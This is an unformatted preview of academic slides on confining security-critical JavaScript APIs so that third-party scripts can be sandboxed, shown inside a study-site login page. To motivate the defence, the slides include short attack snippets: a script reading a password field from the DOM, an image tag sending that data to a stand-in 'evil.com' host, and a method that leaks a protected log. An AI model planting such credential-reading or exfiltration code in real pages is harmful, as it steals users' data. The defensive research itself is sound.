View Full Document

Automated Encapsulation Analysis of Security - Critical APIs



View the full content.
View Full Document
View Full Document

24 views

Unformatted text preview:

Automated Encapsulation Analysis of Security Critical APIs Ankur Taly Stanford University Joint work with lfar Erlingsson John C Mitchell Mark S Miller and Jasvir Nagra Ankur Taly JavaScript API Confinement 1 Web 2 0 Webpages with Third party Code Lots of client side JavaScript AJAX High Impact Millions of users loads of e commerce Ankur Taly JavaScript API Confinement 2 Embedded JavaScript Security Threats script src http adpublisher com ad1 js script Can read password from the DOM var c document getElementsByName password 0 Has direct access to the entire JavaScript DOM API Sandbox untrusted code and only provide it with restricted access to the DOM Sending information is not subject to same origin policy img src http www evil com info jpg info Ankur Taly JavaScript API Confinement 3 Language based Sandboxing This Work 2 Sandboxed code JS Filter Rewriter B com 3rd party Untrusted API Protected resources 1 A com hosting Page Trusted Facebook FBJS Yahoo ADSafe Google Caja Ankur Taly JavaScript API Confinement 4 Mediated Access window location r1 function getHostName return window location host Closure r2 r3 r4 Closure Resources DOM Ankur Taly f1 Access fn Access Untrusted JavaScript code API Sandbox JavaScript API Confinement 5 API Design Write only Log Example critical function push x log push x 0 API 0 var log critical 0 0 log never leaks Untrusted code must only be able to write to log 1 Sandbox prevents direct access to log 2 API only allows data to be written to log Ankur Taly JavaScript API Confinement 6 API Design Adding a store method critical function push x log push x 0 0 var log critical 0 0 function store i x log i x API log leaks var steal API store push function steal this API push steal now contains critical Ankur Taly JavaScript API Confinement 7 Two Problems Sandboxed code API Sandboxing Ensure that access to protected resources is obtained ONLY using the API Protected resources API Confinement Verify that no sandboxed untrusted program can use the



Access the best Study Guides, Lecture Notes and Practice Exams

Loading Unlocking...
Login

Join to view Automated Encapsulation Analysis of Security - Critical APIs and access 3M+ class-specific study document.

or
We will never post anything without your permission.
Don't have an account?
Sign Up

Join to view Automated Encapsulation Analysis of Security - Critical APIs and access 3M+ class-specific study document.

or

By creating an account you agree to our Privacy Policy and Terms Of Use

Already a member?